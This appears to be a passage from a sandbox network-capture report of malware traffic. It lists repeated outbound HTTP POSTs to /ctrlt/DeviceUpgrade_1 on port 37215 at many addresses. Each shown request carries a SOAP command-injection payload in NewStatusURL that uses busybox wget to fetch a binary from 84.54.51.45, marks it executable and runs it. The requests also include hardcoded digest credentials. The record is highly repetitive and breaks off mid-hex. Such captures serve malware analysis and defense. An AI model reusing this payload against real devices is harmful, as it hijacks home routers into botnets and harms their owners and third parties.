                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            315192.168.2.1555226197.225.191.22637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780411959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            316192.168.2.1553606197.68.137.6637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780452013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            317192.168.2.1560058197.104.20.3237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780471087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            318192.168.2.1543782197.2.239.6137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780498981 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            319192.168.2.1544990197.167.21.5537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780512094 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            320192.168.2.1549462197.86.164.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780549049 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            321192.168.2.1543876197.84.77.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780601978 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            322192.168.2.1550160197.200.231.18437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780605078 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            323192.168.2.1540830197.158.30.25337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780669928 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            324192.168.2.1533982197.87.163.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780694962 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 